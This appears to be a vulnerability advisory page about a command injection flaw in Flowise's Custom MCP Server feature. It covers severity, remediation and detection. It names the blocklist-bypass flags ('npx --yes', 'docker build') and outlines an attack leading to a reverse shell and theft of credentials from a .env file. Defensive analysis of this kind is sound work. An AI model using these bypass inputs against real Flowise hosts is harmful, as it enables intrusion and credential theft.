AI Threat Alert

CVE-2026-56274: Flowise: RCE via MCP server command validation bypass

CRITICAL
Published June 23, 2026
CISO Take

Flowise before 3.1.2 has a critical OS command injection flaw (CVSS 9.9) in its Custom MCP Server feature: any authenticated user — including the lowest-privilege role — can configure a malicious MCP server that bypasses the validateCommandFlags blocklist (for example, 'npx --yes' passes while the blocked '-y' equivalent fails) and circumvents the local file access regex, resulting in arbitrary command execution on the Flowise host. The Scope:Changed vector means a single low-privilege account is sufficient to fully compromise confidentiality, integrity, and availability of the underlying host — not just the Flowise container — making this especially dangerous in multi-tenant or shared AI agent environments. No public exploit is confirmed yet, but the bypass technique is documented in detail in the vendor advisory, making weaponization trivially fast for any attacker with a Flowise login. Patch to 3.1.2 immediately; if patching is delayed, restrict Flowise access to trusted accounts only, revoke broad API keys, and monitor the Flowise process tree for unexpected child processes (npx, docker, bash, curl).

Sources: NVD GitHub Advisory VulnCheck ATLAS

What is the risk?

CRITICAL. The combination of CVSS 9.9, network-reachable attack vector, low attack complexity, low privileges required, and Scope:Changed makes this one of the highest-severity profiles possible. Flowise is a no-code AI agent builder routinely deployed with privileged host access and connections to LLM APIs, vector stores, and internal databases — the blast radius of a compromised Flowise host extends well beyond the application itself. The package has 100 prior CVEs indicating a persistent pattern of security debt. The specific bypass (long-form flag variants not in the blocklist) suggests the original validation was implemented without adversarial review, and similar bypasses likely exist for other blocked commands.

How does the attack unfold?

Initial Access
Attacker authenticates to Flowise using any account role or an API key with view/update chatflow permissions — no elevated privilege needed.
AML.T0012
Malicious Agent Config
Attacker creates or edits a chatflow to embed a Custom MCP Server entry using blocked-equivalent command flags (e.g., 'npx --yes' or 'docker build') that pass the validateCommandFlags and validateArgsForLocalFileAccess checks.
AML.T0081
Command Execution
Flowise processes the chatflow invocation and executes the attacker-specified MCP server command on the host OS without adequate sanitization, achieving arbitrary code execution with Flowise process privileges.
AML.T0050
Host Compromise
Attacker establishes persistence via reverse shell, exfiltrates LLM API keys and database credentials from host environment files, and pivots to connected AI infrastructure services.
AML.T0072

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Flowise npm No patch

Do you use Flowise? You're affected.

How severe is it?

CVSS 3.1
9.9 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Changed
C High
I High
A High

What should I do?

5 steps

  1. PATCH

    Upgrade Flowise to 3.1.2 or later — this is the only complete remediation.

  2. ACCESS CONTROL

    Until patched, restrict Flowise to trusted accounts only; suspend non-essential user accounts and revoke API keys with view/update chatflow permissions from untrusted parties.

  3. AUDIT

    Review all existing chatflow configurations for unexpected Custom MCP Server entries; specifically look for commands using 'npx --yes', 'docker build', or other long-form flag variants that may bypass the existing blocklist.

  4. NETWORK ISOLATION

    Place unpatched Flowise instances behind a VPN or IP allowlist to reduce attack surface.

  5. DETECTION

    Monitor the Flowise host process tree for unexpected child processes (npx, docker, bash, sh, curl, wget) spawned by the Flowise Node.js process; alert on outbound connections from the Flowise process to external IPs.

How is it classified?

Code Execution Auth Bypass Agent Plugin AML.T0012 AML.T0049 AML.T0050 AML.T0053 AML.T0072 AML.T0081

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 9 - Risk management system
ISO 42001
A.6.2.6 - AI system security controls
NIST AI RMF
MANAGE 2.2 - Risk treatment and response for AI risks
OWASP LLM Top 10
LLM06 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-56274?

Flowise before 3.1.2 has a critical OS command injection flaw (CVSS 9.9) in its Custom MCP Server feature: any authenticated user — including the lowest-privilege role — can configure a malicious MCP server that bypasses the validateCommandFlags blocklist (for example, 'npx --yes' passes while the blocked '-y' equivalent fails) and circumvents the local file access regex, resulting in arbitrary command execution on the Flowise host. The Scope:Changed vector means a single low-privilege account is sufficient to fully compromise confidentiality, integrity, and availability of the underlying host — not just the Flowise container — making this especially dangerous in multi-tenant or shared AI agent environments. No public exploit is confirmed yet, but the bypass technique is documented in detail in the vendor advisory, making weaponization trivially fast for any attacker with a Flowise login. Patch to 3.1.2 immediately; if patching is delayed, restrict Flowise access to trusted accounts only, revoke broad API keys, and monitor the Flowise process tree for unexpected child processes (npx, docker, bash, curl).

Is CVE-2026-56274 actively exploited?

No confirmed active exploitation of CVE-2026-56274 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-56274?

1. PATCH: Upgrade Flowise to 3.1.2 or later — this is the only complete remediation. 2. ACCESS CONTROL: Until patched, restrict Flowise to trusted accounts only; suspend non-essential user accounts and revoke API keys with view/update chatflow permissions from untrusted parties. 3. AUDIT: Review all existing chatflow configurations for unexpected Custom MCP Server entries; specifically look for commands using 'npx --yes', 'docker build', or other long-form flag variants that may bypass the existing blocklist. 4. NETWORK ISOLATION: Place unpatched Flowise instances behind a VPN or IP allowlist to reduce attack surface. 5. DETECTION: Monitor the Flowise host process tree for unexpected child processes (npx, docker, bash, sh, curl, wget) spawned by the Flowise Node.js process; alert on outbound connections from the Flowise process to external IPs.

What systems are affected by CVE-2026-56274?

This vulnerability affects the following AI/ML architecture patterns: AI agent frameworks, No-code LLM workflow builders, MCP server integrations, RAG pipelines, Chatbot backends.

What is the CVSS score for CVE-2026-56274?

CVE-2026-56274 has a CVSS v3.1 base score of 9.9 (CRITICAL).

What is the AI security impact?

Affected AI Architectures

AI agent frameworksNo-code LLM workflow buildersMCP server integrationsRAG pipelinesChatbot backends

MITRE ATLAS Techniques

AML.T0012 Valid Accounts
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell
AML.T0081 Modify AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: A.6.2.6
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM06

What are the technical details?

Original Advisory

Flowise before 3.1.2 contains multiple OS command injection vulnerabilities in the Custom MCP Server feature due to incomplete command-flag validation and a regex bypass in local file access restrictions. An attacker with a Flowise account of any role, or API access with view/update permissions for chatflows, can configure a malicious MCP server to bypass the validateCommandFlags blocklist (for example, 'docker build' is not blocked, and 'npx --yes' is not blocked while only '-y' is) and the validateArgsForLocalFileAccess checks, resulting in execution of arbitrary commands on the Flowise host.

Exploitation Scenario

An attacker with a low-privilege Flowise account accesses the chatflow editor and adds a Custom MCP Server node. Instead of using the blocked '-y' flag, they specify 'npx --yes' with a malicious package name pointing to attacker-controlled code — a flag the validateCommandFlags blocklist does not check. When the chatflow is invoked (by any user or API query), Flowise processes the MCP server configuration and executes the command on the host without sanitization. The attacker receives a reverse shell, reads /opt/flowise/.env to exfiltrate all LLM provider API keys, database credentials, and Stripe secrets, then uses those credentials to pivot into connected services. The entire attack requires no special ML knowledge — just a Flowise account and knowledge of the blocklist gap.

Weaknesses (CWE)

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

References

Timeline

Published
June 23, 2026
Last Modified
June 23, 2026
First Seen
June 23, 2026

Related Vulnerabilities

CRITICAL CVE-2025-59528 10.0

Flowise: Unauthenticated RCE via MCP config injection

Same package: flowise
CRITICAL CVE-2026-46442 9.9

Flowise: sandbox escape enables authenticated RCE

Same package: flowise
CRITICAL CVE-2025-61913 9.9

Flowise: path traversal in file tools leads to RCE

Same package: flowise
CRITICAL CVE-2026-40933 9.9

Flowise: RCE via MCP stdio command injection

Same package: flowise
CRITICAL CVE-2026-30821 9.8

flowise: Arbitrary File Upload enables RCE

Same package: flowise
Back to Threat Feed